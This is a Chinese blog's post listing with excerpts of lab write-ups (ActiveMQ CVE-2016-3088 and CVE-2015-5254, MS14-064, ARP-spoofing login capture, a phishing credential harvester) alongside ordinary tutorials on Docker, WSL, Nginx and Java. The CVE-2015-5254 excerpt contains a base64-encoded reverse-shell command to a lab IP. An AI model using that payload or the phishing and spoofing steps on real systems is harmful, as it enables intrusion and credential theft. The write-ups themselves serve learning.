- 博客(16)
- 收藏
- 关注
RSS订阅原创 CVE-2016-3088(ActiveMQ任意文件写入漏洞)
根目录在/opt/activemq下面,所以我们访问的目录是/opt/activemq/webapps/,上传的最终目录就是/opt/activemq/webapps/admin(aqi)因此这里我自己新建了一个字典进行爆破目标字段,我用的是yakit,我的bur总出问题,麻烦,爆破过程不在赘述,事实证明是可以爆破出来的,这里可以参考这位大佬的博客。上传成功,接下来将该目录移动到api目录下,也可以到admin只要能解析就行,现在就要用到/opt/activemq/webapps/admin/路径了。
2024-09-14 11:38:41
534
原创 CVE-2015-5254(ActiveMQ-反序列化漏洞)
因此这条消息就是bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNDIuMTMwLzkwMDEgMD4mMQ==}|{base64,-d}|{bash,-i}"监听了61616和8161端口,其中61616是工作端口,消息就在这个端口进行传递;8161是web管理页面的端口,访问127.0.0.1:8186即可访问,不过这个漏洞理论上不需要web的。,或者使用云悉指纹识别,我这里是本地,云悉是不可以识别本地的。3、访问web管理页面,读取消息,触发漏洞。
2024-09-13 10:39:45
1073
原创 内存的分区
内存一般分为四个区可以使用,存放不同的数据,使用方式也不同,分别是:堆、栈、全局(静态)、代码区。对于一个程序来说,编译程序需要占用的是五个部分:堆、栈、全局(静态)、文字常量、代码区。
2024-09-12 13:12:57
1067
原创 MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞)
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。
2024-04-24 11:33:24
449
4
原创 ARP欺骗盗取账密
通过工具arpspoof实现ARP欺骗,使用wireshark截取靶机登录数据包窃取隐私数据。通过工具arpspoof和wireshark的搭配使用,成功截取目标输入的账号以及密码。通过ARP欺骗学习有关ARP协议相关知识。Kali、Windows靶机。
2023-11-27 10:33:01
179
原创 WinSever2016搭建隧道
第一次安装的时候是没有下拉选项的,这里我是已经安装好了,默认下一步的时候,在后面会有一个界面是要你选,选择这两个,继续安装完成即可。学习使用WinSever自带的角色和服务搭建VPN服务,并用客户机Win10链接VPN,旨在学习代理,隧道,VPN的知识。随后在安全中设置密码,客户端配置的时候需要用到。双击接口,选择服务和端口选项卡,勾选VPN。右击右下角网络标识,打开网络,添加VPN。服务器地址是刚配置的服务器ip地址。右击服务器,重新启动所有服务。供应商windows内置。右击NAT,新增接口。
2023-11-07 19:44:27
737
原创 社会工程学盗取账密
6)随后访问攻击机IP,并且点击这个生成的网址,这里访问的就是工具自动生成的网页,登录账号密码后攻击机就显示了账号密码,随后会跳转到goole网站的页面,但是并没有登录。5)需要首先填入攻击机的IP,填kali的IP即可,我的是192.168.234.129,回车随后选择模版,这里我选择goole模版,回车后监听开启。3)选择2)网站攻击向量,随后选择3)凭证收割机攻击方法,这里是使用给定的网站,以欺骗用户输入个人敏感信息,如用户名、密码等。2)选择1)进入社会工程学攻击模块。图1-6 浏览器访问页面。
2023-11-05 03:00:50
94
原创 Docker-Ubuntu安装教程
默认情况下,只有root用户和docker组的用户才能运行Docker命令。我们可以将当前用户添加到docker组,以避免每次使用Docker时都需要使用sudo。因为我们之前没有拉取过hello-world,所以运行命令后会出现本地没有该镜像,并且会自动拉取的操作。上面我们拉取了hello-world的镜像,现在我们可以通过命令来查看镜像。为了确认所下载软件包的合法性,需要添加软件源的 GPG 密钥。apt-get可能会报告您没有安装这些软件包。
2023-11-03 16:25:02
38
原创 Win11安装linux子系统(kali)
低于 18362 的版本不支持 WSL 2。使用更新 Windows 版本。Windows 版本 1903 支持也仅适用于 x64 系统。如果使用的是 Arm64 版本的 Windows,则需要升级到 Windows 10 版本 2004 或更高版本才能完全访问 WSL 2如果运行的是 Windows 10 版本1903 或 1909,请在 Windows 菜单中打开“设置”,导航到“更新和安全性”,然后选择“检查更新”。
2023-11-03 16:23:47
486
原创 Nginx反向代理
配置Nginx反向代理第一部分主要会设置一些影响 Nginx 服务器整体运行的配置指令,主要包括:配置运行 Nginx 服务器的用户(组)、允许生成的 worker process 数,进程 PID 存放路径、日志存放路径和类型以及配置文件的引入等。上面这行 worker_processes 配置,这是 Nginx 服务器并发处理服务的关键配置,该值越大,可以支持的并发处理量也越多,但是会受到硬件、软件等设备的制约events 块
2023-11-03 16:20:50
42
原创 Java 使用二维数组制作简单的酒店管理系统
酒店管理系统/*5、系统应该对外提供的功能:可以预定房间:用户输入房间编号,订房。可以退房:用户输入房间编号,退房。可以查看所有房间的状态:用户输入某个指令应该可以查看所有房间状态*/// 这个是这个大楼的房间,真的很憨憨的制作方法(笑哭)
2023-02-10 16:59:00
269
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人